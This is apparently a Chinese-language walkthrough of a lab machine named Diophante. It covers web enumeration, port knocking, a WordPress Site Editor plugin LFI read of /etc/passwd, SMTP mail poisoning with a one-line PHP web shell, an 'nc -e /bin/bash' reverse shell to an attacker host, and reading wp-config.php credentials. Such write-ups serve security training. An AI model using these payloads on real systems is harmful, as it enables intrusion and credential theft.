22\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2534\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n \ud83c\udfc1 Press [ENTER] to use the Scan Management Menu\u2122\n\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\n^C \n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ feroxbuster -u http:\/\/$IP\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x html txt php -s 200 301 302 -d 2 2>\/dev\/null\n\n301 GET 9l 28w 315c http:\/\/192.168.10.107\/blog => http:\/\/192.168.10.107\/blog\/\n200 GET 368l 933w 10701c http:\/\/192.168.10.107\/index.html\n200 GET 24l 126w 10356c http:\/\/192.168.10.107\/icons\/openlogo-75.png\n200 GET 368l 933w 10701c http:\/\/192.168.10.107\/\n301 GET 9l 28w 326c http:\/\/192.168.10.107\/blog\/wp-content => http:\/\/192.168.10.107\/blog\/wp-content\/\n200 GET 104l 522w 8227c http:\/\/192.168.10.107\/blog\/wp-login.php\n200 GET 384l 3177w 19915c http:\/\/192.168.10.107\/blog\/license.txt\n301 GET 9l 28w 327c http:\/\/192.168.10.107\/blog\/wp-includes => http:\/\/192.168.10.107\/blog\/wp-includes\/\n301 GET 0l 0w 0c http:\/\/192.168.10.107\/blog\/index.php => http:\/\/192.168.10.107\/blog\/\n200 GET 379l 746w 5972c http:\/\/192.168.10.107\/blog\/wp-admin\/css\/install.css\n200 GET 13l 78w 4373c http:\/\/192.168.10.107\/blog\/wp-admin\/images\/wordpress-logo.png\n302 GET 0l 0w 0c http:\/\/192.168.10.107\/blog\/wp-admin\/update-core.php => http:\/\/hard\/blog\/wp-login.php?redirect_to=http%3A%2F%2F192.168.10.107%2Fblog%2Fwp-admin%2Fupdate-core.php&reauth=1\n302 GET 0l 0w 0c http:\/\/192.168.10.107\/blog\/wp-admin\/import.php => http:\/\/hard\/blog\/wp-login.php?redirect_to=http%3A%2F%2F192.168.10.107%2Fblog%2Fwp-admin%2Fimport.php&reauth=1\n200 GET 17l 88w 1287c http:\/\/192.168.10.107\/blog\/wp-admin\/install.php\n200 GET 23l 86w 1248c http:\/\/192.168.10.107\/blog\/wp-admin\/upgrade.php\n302 GET 0l 0w 0c http:\/\/192.168.10.107\/blog\/wp-admin\/ => http:\/\/hard\/blog\/wp-login.php?redirect_to=http%3A%2F%2F192.168.10.107%2Fblog%2Fwp-admin%2F&reauth=1\n200 GET 99l 1009w 8852c http:\/\/192.168.10.107\/blog\/readme.html\n200 GET 3l 6w 36c http:\/\/192.168.10.107\/note.txt\n200 GET 5l 15w 165c http:\/\/192.168.10.107\/blog\/wp-trackback.php\n301 GET 9l 28w 324c http:\/\/192.168.10.107\/blog\/wp-admin => http:\/\/192.168.10.107\/blog\/wp-admin\/\n302 GET 0l 0w 0c http:\/\/192.168.10.107\/blog\/wp-signup.php => http:\/\/hard\/blog\/wp-login.php?action=register<\/code><\/pre>\nwpscan\u626b\u63cf<\/h3>\n
\u76ee\u5f55\u626b\u63cf\u7c97\u7565\u53d1\u73b0\u662f\u4e00\u4e2awordpress<\/code><\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ wpscan --url http:\/\/$IP\/blog --api-token xxxxxxxxxxxxxxx\n_______________________________________________________________\n __ _______ _____\n \\ \\ \/ \/ __ \\ \/ ____|\n \\ \\ \/\\ \/ \/| |__) | (___ ___ __ _ _ __ \u00ae\n \\ \\\/ \\\/ \/ | ___\/ \\___ \\ \/ __|\/ _` | '_ \\\n \\ \/\\ \/ | | ____) | (__| (_| | | | |\n \\\/ \\\/ |_| |_____\/ \\___|\\__,_|_| |_|\n\n WordPress Security Scanner by the WPScan Team\n Version 3.8.28\n Sponsored by Automattic - https:\/\/automattic.com\/\n @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart\n_______________________________________________________________\n\n[+] URL: http:\/\/192.168.10.107\/blog\/ [192.168.10.107]\n[+] Started: Fri Jun 13 21:31:19 2025\n\nInteresting Finding(s):\n\n[+] Headers\n | Interesting Entry: Server: Apache\/2.4.38 (Debian)\n | Found By: Headers (Passive Detection)\n | Confidence: 100%\n\n[+] XML-RPC seems to be enabled: http:\/\/192.168.10.107\/blog\/xmlrpc.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n | References:\n | - http:\/\/codex.wordpress.org\/XML-RPC_Pingback_API\n | - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_ghost_scanner\/\n | - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/dos\/http\/wordpress_xmlrpc_dos\/\n | - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_xmlrpc_login\/\n | - https:\/\/www.rapid7.com\/db\/modules\/auxiliary\/scanner\/http\/wordpress_pingback_access\/\n\n[+] WordPress readme found: http:\/\/192.168.10.107\/blog\/readme.html\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] Upload directory has listing enabled: http:\/\/192.168.10.107\/blog\/wp-content\/uploads\/\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 100%\n\n[+] The external WP-Cron seems to be enabled: http:\/\/192.168.10.107\/blog\/wp-cron.php\n | Found By: Direct Access (Aggressive Detection)\n | Confidence: 60%\n | References:\n | - https:\/\/www.iplocation.net\/defend-wordpress-from-ddos\n | - https:\/\/github.com\/wpscanteam\/wpscan\/issues\/1299\n\n[+] WordPress version 5.7 identified (Insecure, released on 2021-03-09).\n | Found By: Emoji Settings (Passive Detection)\n | - http:\/\/192.168.10.107\/blog\/, Match: 'wp-includes\\\/js\\\/wp-emoji-release.min.js?ver=5.7'\n | Confirmed By: Meta Generator (Passive Detection)\n | - http:\/\/192.168.10.107\/blog\/, Match: 'WordPress 5.7'\n |\n | [!] 44 vulnerabilities identified:\n |\n | [!] Title: WordPress 5.6-5.7 - Authenticated XXE Within the Media Library Affecting PHP 8\n | Fixed in: 5.7.1\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/cbbe6c17-b24e-4be4-8937-c78472a138b5\n | - https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2021-29447\n | - https:\/\/wordpress.org\/news\/2021\/04\/wordpress-5-7-1-security-and-maintenance-release\/\n | - https:\/\/core.trac.wordpress.org\/changeset\/29378\n | - https:\/\/blog.wpscan.com\/2021\/04\/15\/wordpress-571-security-vulnerability-release.html\n | - https:\/\/github.com\/WordPress\/wordpress-develop\/security\/advisories\/GHSA-rv47-pc52-qrhh\n | - https:\/\/blog.sonarsource.com\/wordpress-xxe-security-vulnerability\/\n | - https:\/\/hackerone.com\/reports\/1095645\n | - https:\/\/www.youtube.com\/watch?v=3NBxcmqCgt4\n ---------------------\n | [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in Template-Part Block\n | Fixed in: 5.7.12\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/7c448f6d-4531-4757-bff0-be9e3220bbbb\n | - https:\/\/wordpress.org\/news\/2024\/06\/wordpress-6-5-5\/\n |\n | [!] Title: WordPress < 6.5.5 - Contributor+ Path Traversal in Template-Part Block\n | Fixed in: 5.7.12\n | References:\n | - https:\/\/wpscan.com\/vulnerability\/36232787-754a-4234-83d6-6ded5e80251c\n | - https:\/\/wordpress.org\/news\/2024\/06\/wordpress-6-5-5\/\n\n[i] The main theme could not be detected.\n\n[+] Enumerating All Plugins (via Passive Methods)\n\n[i] No plugins Found.\n\n[+] Enumerating Config Backups (via Passive and Aggressive Methods)\n Checking Config Backups - Time: 00:00:00 <==============================================================================================================> (137 \/ 137) 100.00% Time: 00:00:00\n[i] No Config Backups Found.\n\n[+] WPScan DB API OK\n | Plan: free\n | Requests Done (during the scan): 1\n | Requests Remaining: 24\n\n[+] Finished: Fri Jun 13 21:31:29 2025\n[+] Requests Done: 142\n[+] Cached Requests: 29\n[+] Data Sent: 37.18 KB\n[+] Data Received: 46.259 KB\n[+] Memory used: 237.539 MB\n[+] Elapsed time: 00:00:09<\/code><\/pre>\n\u7136\u540e\u68c0\u7d22\u4e86\u4e00\u4e0b\u7528\u6237\uff1a<\/p>\n
[i] User(s) Identified:\n\n[+] sabine\n | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)<\/code><\/pre>\n\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n\u8e29\u70b9<\/h3>\n
\u767b\u5f55\u9875\u9762\u662f\u4e00\u4e2a\u9ed8\u8ba4\u7684\u767b\u5f55\u9875\u9762Apache2 Debian Default Page<\/code>\uff0c\u770b\u6765\u4e1c\u897f\u4e0d\u5728\u8fd9\u3002\u3002\u3002\u3002<\/p>\n<\/div><\/p>\nknock<\/h3>\n
\u76ee\u5f55\u53d1\u73b0\u4e00\u5904\u63d0\u793a\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ curl -s http:\/\/192.168.10.107\/note.txt\nDon't forget: 7000 8000 9000\n\nadmin<\/code><\/pre>\nknock \u4e00\u4e0b\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ knock 7000 8000 9000\n\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n\nOpen 192.168.10.107:22\nOpen 192.168.10.107:25\nOpen 192.168.10.107:80\n\nPORT STATE SERVICE REASON VERSION\n22\/tcp open ssh syn-ack ttl 64 OpenSSH 8.4p1 Debian 5 (protocol 2.0)\n| ssh-hostkey: \n| 2048 34:55:b2:c3:59:4e:b1:e5:dc:47:bb:73:f6:df:de:43 (RSA)\n| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC31MDow8cn4PkHzTyr6hHNjHWNqArCM26Eel8Tl1DxnZX56uuHi893mc\/+VVo75DqHnfU6etdZhCPeZ+5O3AS6iinLDT7vSlPd013+SHDU3gFHtvz76fLejnlnen4N7Vf37jYcfdF1EG9C7k017gDQc9Cby4\/QwGpXyrYAcLxmhO0odPDBQyULO\/gzzTkfyCJROF\/+vrr2AcX\/K4i9Sa9sE31FzDo1N\/bh0GOhlika1gB8KbBtcBDqWr0UpZIcbnQZZWQRCI9JpxRNhO3azk9kkh7gyJ\/Ul3rniU\/BgX1oQhJqVDACuMDlHDTud43MStiuOnC3OaTQqkrGAVAfwBOl\n| 256 5a:c3:b8:80:53:27:8f:b4:ef:27:89:c8:e5:a6:1f:81 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBCok8Zb2Hn7EFxIGAbamuVBZEtn\/ZdRpDwrIRWK8pWua+Mcn69g9Ddrd7CC87isXqcfV2St0XtBstpKi+Pg9LvY=\n| 256 08:46:e6:ba:d3:64:31:88:e7:d3:66:94:ce:52:80:35 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIG1XyCckVuVysYcnoiHoHkcDpY1TOfwJ3V+Gh9yGbUXR\n25\/tcp open smtp syn-ack ttl 64 Postfix smtpd\n| ssl-cert: Subject: commonName=debian\n| Subject Alternative Name: DNS:debian\n| Issuer: commonName=debian\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2021-04-07T07:11:28\n| Not valid after: 2031-04-05T07:11:28\n| MD5: 57e2:69bb:8411:97da:6ae7:23ec:682c:e1d7\n| SHA-1: e8cd:3c39:4301:4e53:99b6:ba02:3fea:04bd:a48b:0f66\n| -----BEGIN CERTIFICATE-----\n| MIIC0DCCAbigAwIBAgIUWq6t5x5ifQADHbAT1jP8zFP1HDAwDQYJKoZIhvcNAQEL\n| BQAwETEPMA0GA1UEAwwGZGViaWFuMB4XDTIxMDQwNzA3MTEyOFoXDTMxMDQwNTA3\n| MTEyOFowETEPMA0GA1UEAwwGZGViaWFuMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8A\n| MIIBCgKCAQEArs5OM6mhTflVnLKiwC08GRsXSQidMlmFDJGECVtfwhdWJZlAaYju\n| u8g25w+1shV5jxa47PnSsfp7Jr2urVsPl1iAiqqrSC84nbrzhP5LpPD4wzFuOGak\n| 0U77Yb9mv1fX1AZNoEm4S5GTFvOMb2cfIbVbUFgX3vREMOAQUTyjX4+Bxns4\/1M\/\n| 9sZweDdAUrgHscJu8o2v2tRTeW6wSQAbiRer0C9oExqOQHYaZzbaFwnEPyzCHdgO\n| 6zzIhGeX8xNcjE3YdjbW3+eVvE8QOEfScQoc0K1HFpUXtY2OsLGrUTkiGcFqV6zA\n| tVhP74FDfPyNue\/1bIhkogK7PbJT3ONgQwIDAQABoyAwHjAJBgNVHRMEAjAAMBEG\n| A1UdEQQKMAiCBmRlYmlhbjANBgkqhkiG9w0BAQsFAAOCAQEAMdm+7kAojV0ZLAGD\n| +a+tWQ8OiauOFfjUK9IGljJbKc0xujYWq6glJJHI4h2QF6CjxOBL5mPV5qt4JYvZ\n| yFWJvzWvjy0pDwgsm8OHL8sJydZrqBw1QjLWYnPHhpeKbiZO9W9mYkTC7r8aNreW\n| z7yF\/l7diFs8csEFvKnG9C3JtRgFo0C1baWn5GraecBut9E6QCdz0Ad\/Gqu30cEY\n| 6ArLC+jHkX4phDH0V5\/FJov0kctTdIlu0Oj+ItfvOel5ifn3tLIBEVmutvuHim6x\n| vrkdNkjdLmjgdKjm8y+vWHDDKn+Z\/sEHp8AXqJj7ynf3mE6RrQgTJLFG4R0R84n7\n| 9bqenw==\n|_-----END CERTIFICATE-----\n|_smtp-commands: debian, PIPELINING, SIZE 10240000, VRFY, ETRN, STARTTLS, ENHANCEDSTATUSCODES, 8BITMIME, DSN, SMTPUTF8, CHUNKING\n|_ssl-date: TLS randomness does not represent time\n80\/tcp open http syn-ack ttl 64 Apache httpd 2.4.38 ((Debian))\n| http-methods: \n|_ Supported Methods: HEAD GET POST OPTIONS\n|_http-server-header: Apache\/2.4.38 (Debian)\n|_http-title: Apache2 Debian Default Page: It works\nMAC Address: 08:00:27:7B:4E:08 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: Host: debian; OS: Linux; CPE: cpe:\/o:linux:linux_kernel<\/code><\/pre>\n25<\/code>\u7aef\u53e3\u5f00\u653e\u4e86\uff01<\/p>\n\u63d2\u4ef6\u6f0f\u6d1e=>LFI<\/h3>\n
\u68c0\u7d22\u4e00\u4e0b\u662f\u5426\u5b58\u5728\u6f0f\u6d1e\uff0c\u68c0\u7d22\u4e00\u4e0b\u63d2\u4ef6\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ cmseek -u $IP\/blog\n\n___ _ _ ____ ____ ____ _ _\n| |\\\/| [__ |___ |___ |_\/ by @r3dhax0r\n|___ | | ___| |___ |___ | \\_ Version 1.1.3 K-RONA\n\n [+] Deep Scan Results [+] \n\n \u250f\u2501Target: 192.168.10.107\n \u2503\n \u2520\u2500\u2500 CMS: WordPress\n \u2503 \u2502\n \u2503 \u251c\u2500\u2500 Version: 5.7\n \u2503 \u2570\u2500\u2500 URL: https:\/\/wordpress.org\n \u2503\n \u2520\u2500\u2500[WordPress Deepscan]\n \u2503 \u2502\n \u2503 \u251c\u2500\u2500 License file: http:\/\/192.168.10.107\/blog\/license.txt\n \u2503 \u2502\n \u2503 \u251c\u2500\u2500 Plugins Enumerated: 1\n \u2503 \u2502 \u2502\n \u2503 \u2502 \u2570\u2500\u2500 Plugin: site-editor\n \u2503 \u2502 \u2502\n \u2503 \u2502 \u251c\u2500\u2500 Version: 4.3\n \u2503 \u2502 \u2570\u2500\u2500 URL: http:\/\/192.168.10.107\/blog\/wp-content\/plugins\/site-editor\n \u2503 \u2502\n \u2503 \u2502\n \u2503 \u251c\u2500\u2500 Themes Enumerated: 1\n \u2503 \u2502 \u2502\n \u2503 \u2502 \u2570\u2500\u2500 Theme: twentynineteen\n \u2503 \u2502 \u2502\n \u2503 \u2502 \u251c\u2500\u2500 Version: 2.0\n \u2503 \u2502 \u2570\u2500\u2500 URL: http:\/\/192.168.10.107\/blog\/wp-content\/themes\/twentynineteen\n \u2503 \u2502\n \u2503\n \u2520\u2500\u2500 Result: \/home\/kali\/temp\/Diophante\/Result\/192.168.10.107_blog\/cms.json\n \u2503\n \u2517\u2501Scan Completed in 1.71 Seconds, using 45 Requests\n\n CMSeeK says ~ Annyeong<\/code><\/pre>\n\u53d1\u73b0\u4e00\u5904\u63d2\u4ef6\uff0c\u770b\u4e00\u4e0b\u6709\u65e0\u76f8\u5173\u6f0f\u6d1e\uff1a<\/p>\n
<\/div><\/p>\n\u770b\u4e00\u4e0b\u5982\u4f55\u5229\u7528\u7684\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ cat 44340.txt \nProduct: Site Editor WordPress Plugin - https:\/\/wordpress.org\/plugins\/site-editor\/\nVendor: Site Editor\nTested version: 1.1.1\nCVE ID: CVE-2018-7422\n\n** CVE description **\nA Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php.\n\n** Technical details **\nIn site-editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php:5, the value of the ajax_path parameter is used for including a file with PHP\u2019s require_once(). This parameter can be controlled by an attacker and is not properly sanitized.\n\nVulnerable code:\nif( isset( $_REQUEST['ajax_path'] ) && is_file( $_REQUEST['ajax_path'] ) && file_exists( $_REQUEST['ajax_path'] ) ){\n require_once $_REQUEST['ajax_path'];\n}\n\nhttps:\/\/plugins.trac.wordpress.org\/browser\/site-editor\/trunk\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?rev=1640500#L5\n\nBy providing a specially crafted path to the vulnerable parameter, a remote attacker can retrieve the contents of sensitive files on the local system.\n\n** Proof of Concept **\nhttp:\/\/<host>\/wp-content\/plugins\/site-editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=\/etc\/passwd\n\n** Solution **\nNo fix available yet.\n\n** Timeline **\n03\/01\/2018: author contacted through siteeditor.org's contact form; no reply\n16\/01\/2018: issue report filled on the public GitHub page with no technical details\n18\/01\/2018: author replies and said he replied to our e-mail 8 days ago (could not find the aforementioned e-mail at all); author sends us "another" e-mail\n19\/01\/2018: report sent; author says he will fix this issue "very soon"\n31\/01\/2018: vendor contacted to ask about an approximate release date and if he needs us to postpone the disclosure; no reply\n14\/02\/2018: WP Plugins team contacted; no reply\n06\/03\/2018: vendor contacted; no reply\n07\/03\/2018: vendor contacted; no reply\n15\/03\/2018: public disclosure\n\n** Credits **\nVulnerability discovered by Nicolas Buzy-Debat working at Orange Cyberdefense Singapore (CERT-LEXSI).\n\n--\nBest Regards,\n\nNicolas Buzy-Debat\nOrange Cyberdefense Singapore (CERT-LEXSI)<\/code><\/pre>\n\u5c1d\u8bd5\u5229\u7528\uff1a<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ curl "http:\/\/192.168.10.107\/blog\/wp-content\/plugins\/site-editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=\/etc\/passwd" --output -\nroot:x:0:0:root:\/root:\/bin\/bash\ndaemon:x:1:1:daemon:\/usr\/sbin:\/usr\/sbin\/nologin\nbin:x:2:2:bin:\/bin:\/usr\/sbin\/nologin\nsys:x:3:3:sys:\/dev:\/usr\/sbin\/nologin\nsync:x:4:65534:sync:\/bin:\/bin\/sync\ngames:x:5:60:games:\/usr\/games:\/usr\/sbin\/nologin\nman:x:6:12:man:\/var\/cache\/man:\/usr\/sbin\/nologin\nlp:x:7:7:lp:\/var\/spool\/lpd:\/usr\/sbin\/nologin\nmail:x:8:8:mail:\/var\/mail:\/usr\/sbin\/nologin\nnews:x:9:9:news:\/var\/spool\/news:\/usr\/sbin\/nologin\nuucp:x:10:10:uucp:\/var\/spool\/uucp:\/usr\/sbin\/nologin\nproxy:x:13:13:proxy:\/bin:\/usr\/sbin\/nologin\nwww-data:x:33:33:www-data:\/var\/www:\/usr\/sbin\/nologin\nbackup:x:34:34:backup:\/var\/backups:\/usr\/sbin\/nologin\nlist:x:38:38:Mailing List Manager:\/var\/list:\/usr\/sbin\/nologin\nirc:x:39:39:ircd:\/var\/run\/ircd:\/usr\/sbin\/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):\/var\/lib\/gnats:\/usr\/sbin\/nologin\nnobody:x:65534:65534:nobody:\/nonexistent:\/usr\/sbin\/nologin\n_apt:x:100:65534::\/nonexistent:\/usr\/sbin\/nologin\nsystemd-timesync:x:101:102:systemd Time Synchronization,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-network:x:102:103:systemd Network Management,,,:\/run\/systemd:\/usr\/sbin\/nologin\nsystemd-resolve:x:103:104:systemd Resolver,,,:\/run\/systemd:\/usr\/sbin\/nologin\nmessagebus:x:104:110::\/nonexistent:\/usr\/sbin\/nologin\nsshd:x:105:65534::\/run\/sshd:\/usr\/sbin\/nologin\nsabine:x:1000:1000:sabine,,,:\/home\/sabine:\/bin\/rbash\nsystemd-coredump:x:999:999:systemd Core Dumper:\/:\/usr\/sbin\/nologin\nmysql:x:106:113:MySQL Server,,,:\/nonexistent:\/bin\/false\npostfix:x:107:114::\/var\/spool\/postfix:\/usr\/sbin\/nologin\nleonard:x:1001:1001:,,,:\/home\/leonard:\/bin\/bash\n{"success":true,"data":{"output":[]}}<\/code><\/pre>\n\u90ae\u4ef6\u4e0a\u4f20webshell<\/h3>\n
\u7531\u4e8e\u5df2\u7ecf\u6709\u6587\u4ef6\u5305\u542b\u6f0f\u6d1e\u4e86\uff0c\u5c1d\u8bd5\u4e0a\u4f20\u4e00\u4e2ashell<\/code>\u5c31\u80fdRCE<\/code>\u4e86\uff0c\u5c1d\u8bd5\u4f7f\u7528 smtp \u529f\u80fd\u8fdb\u884c\u6dfb\u52a0\uff1a<\/p>\n\n\u8fd9\u91cc\u5bf9\u673a\u5b50\u62cd\u4e2a\u5feb\u7167\uff0c\u514d\u5f97\u5931\u8d25\u4e86\u9ebb\u70e6\u3002\u3002\u3002<\/p>\n
<\/div><\/p>\n\u5982\u679c\u6ca1\u4e0a\u9762\u90a3\u5de5\u5177\u680f\uff0c\u4f7f\u7528\u53f3\u8fb9\u7684 ctrl+f \u6216\u8005 c \u8bd5\u8bd5<\/p>\n<\/blockquote>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ telnet $IP 25\nTrying 192.168.10.107...\nConnected to 192.168.10.107.\nEscape character is '^]'.\n220 debian ESMTP Postfix (Debian\/GNU)\nhelo abc\n250 debian\nMAIL FROM: kali@kali.com\n250 2.1.0 Ok\nRCPT TO: sabine\n250 2.1.5 Ok\ndata\n354 End data with <CR><LF>.<CR><LF>\n<?=`$_GET[0]`?> \n.\n250 2.0.0 Ok: queued as 167E180ABD\nquit\n221 2.0.0 Bye\nConnection closed by foreign host.<\/code><\/pre>\n\u7528\u6237\u662f\u6700\u5f00\u59cb\u4fe1\u606f\u641c\u96c6\u65f6\u5019wpscan<\/code>\u626b\u5230\u7684\uff0c\u5c1d\u8bd5\u8bbf\u95ee\u8fdb\u884c\u6267\u884c\u547d\u4ee4\uff01<\/p>\n\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ curl "http:\/\/192.168.10.107\/blog\/wp-content\/plugins\/site-editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=\/var\/mail\/sabine&0=whoami" --output - \nFrom kali@kali.com Sat Jun 14 04:11:43 2025\nReturn-Path: <kali@kali.com>\nX-Original-To: sabine\nDelivered-To: sabine@debian\nReceived: from abc (unknown [192.168.10.102])\n by debian (Postfix) with SMTP id 167E180ABD\n for <sabine>; Sat, 14 Jun 2025 04:10:22 +0200 (CEST)\n\nwww-data\n\n{"success":true,"data":{"output":[]}}<\/code><\/pre>\n\u6267\u884c\u6210\u529f\uff0c\u8bbe\u7f6e\u76d1\u542c\uff0c\u5c1d\u8bd5\u53cd\u5f39shell\uff01\uff01\uff01\uff01<\/p>\n
\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Diophante]\n\u2514\u2500$ curl "http:\/\/192.168.10.107\/blog\/wp-content\/plugins\/site-editor\/editor\/extensions\/pagebuilder\/includes\/ajax_shortcode_pattern.php?ajax_path=\/var\/mail\/sabine&0=nc+-e+\/bin\/bash+192.168.10.102+1234" --output -<\/code><\/pre>\n<\/div><\/p>\n\u63d0\u6743<\/h2>\n\u4fe1\u606f\u641c\u96c6<\/h3>\n(remote) www-data@diophante:\/var\/www\/html\/blog\/wp-content\/plugins\/site-editor\/editor\/extensions\/pagebuilder\/includes$ cd ~\n(remote) www-data@diophante:\/var\/www$ ls -la\ntotal 12\ndrwxr-xr-x 3 root root 4096 Apr 7 2021 .\ndrwxr-xr-x 12 root root 4096 Apr 7 2021 ..\ndrwxr-xr-x 3 www-data www-data 4096 Apr 14 2021 html\n(remote) www-data@diophante:\/var\/www$ cd html\n(remote) www-data@diophante:\/var\/www\/html$ ls -la\ntotal 28\ndrwxr-xr-x 3 www-data www-data 4096 Apr 14 2021 .\ndrwxr-xr-x 3 root root 4096 Apr 7 2021 ..\ndrwxr-xr-x 5 www-data www-data 4096 Apr 14 2021 blog\n-rw-r--r-- 1 www-data www-data 10701 Apr 7 2021 index.html\n-rw-r--r-- 1 www-data www-data 36 Apr 14 2021 note.txt\n(remote) www-data@diophante:\/var\/www\/html$ cd blog\n(remote) www-data@diophante:\/var\/www\/html\/blog$ ls -la\ntotal 228\ndrwxr-xr-x 5 www-data www-data 4096 Apr 14 2021 .\ndrwxr-xr-x 3 www-data www-data 4096 Apr 14 2021 ..\n-rw-r--r-- 1 www-data www-data 299 Apr 7 2021 .htaccess\n-rw-r--r-- 1 www-data www-data 405 Apr 7 2021 index.php\n-rw-r--r-- 1 www-data www-data 19915 Apr 7 2021 license.txt\n-rw-r--r-- 1 www-data www-data 8852 Apr 7 2021 readme.html\n-rw-r--r-- 1 www-data www-data 7165 Apr 7 2021 wp-activate.php\ndrwxr-xr-x 9 www-data www-data 4096 Apr 7 2021 wp-admin\n-rw-r--r-- 1 www-data www-data 351 Apr 7 2021 wp-blog-header.php\n-rw-r--r-- 1 www-data www-data 2328 Apr 7 2021 wp-comments-post.php\n-rw-r--r-- 1 www-data www-data 3538 Apr 7 2021 wp-config-sample.php\n-rw-rw-rw- 1 www-data www-data 3812 Apr 7 2021 wp-config.php\ndrwxr-xr-x 7 www-data www-data 4096 Jun 14 03:53 wp-content\n-rw-r--r-- 1 www-data www-data 3939 Apr 7 2021 wp-cron.php\ndrwxr-xr-x 25 www-data www-data 12288 Apr 7 2021 wp-includes\n-rw-r--r-- 1 www-data www-data 2496 Apr 7 2021 wp-links-opml.php\n-rw-r--r-- 1 www-data www-data 3313 Apr 7 2021 wp-load.php\n-rw-r--r-- 1 www-data www-data 44993 Apr 7 2021 wp-login.php\n-rw-r--r-- 1 www-data www-data 8509 Apr 7 2021 wp-mail.php\n-rw-r--r-- 1 www-data www-data 21125 Apr 7 2021 wp-settings.php\n-rw-r--r-- 1 www-data www-data 31328 Apr 7 2021 wp-signup.php\n-rw-r--r-- 1 www-data www-data 4747 Apr 7 2021 wp-trackback.php\n-rw-r--r-- 1 www-data www-data 3236 Apr 7 2021 xmlrpc.php\n(remote) www-data@diophante:\/var\/www\/html\/blog$ cat wp-config.php\n<?php\n\/**\n * La configuration de base de votre installation WordPress.\n *\n * Ce fichier est utilis\u00e9 par le script de cr\u00e9ation de wp-config.php pendant\n * le processus d\u2019installation. Vous n\u2019avez pas \u00e0 utiliser le site web, vous\n * pouvez simplement renommer ce fichier en \u00ab wp-config.php \u00bb et remplir les\n * valeurs.\n *\n * Ce fichier contient les r\u00e9glages de configuration suivants :\n *\n * R\u00e9glages MySQL\n * Pr\u00e9fixe de table\n * Cl\u00e9s secr\u00e8tes\n * Langue utilis\u00e9e\n * ABSPATH\n *\n * @link https:\/\/fr.wordpress.org\/support\/article\/editing-wp-config-php\/.\n *\n * @package WordPress\n *\/\n\n\/\/ ** R\u00e9glages MySQL - Votre h\u00e9bergeur doit vous fournir ces informations. ** \/\/\n\/** Nom de la base de donn\u00e9es de WordPress. *\/\ndefine( 'DB_NAME', 'wordpress' );\n\n\/** Utilisateur de la base de donn\u00e9es MySQL. *\/\ndefine( 'DB_USER', 'wpuser' );\n\n\/** Mot de passe de la base de donn\u00e9es MySQL. *\/\ndefine( 'DB_PASSWORD', 'wppassword' );\n\n\/** Adresse de l\u2019h\u00e9bergement MySQL. *\/\ndefine( 'DB_HOST', 'localhost' );\n\n\/** Jeu de caract\u00e8res 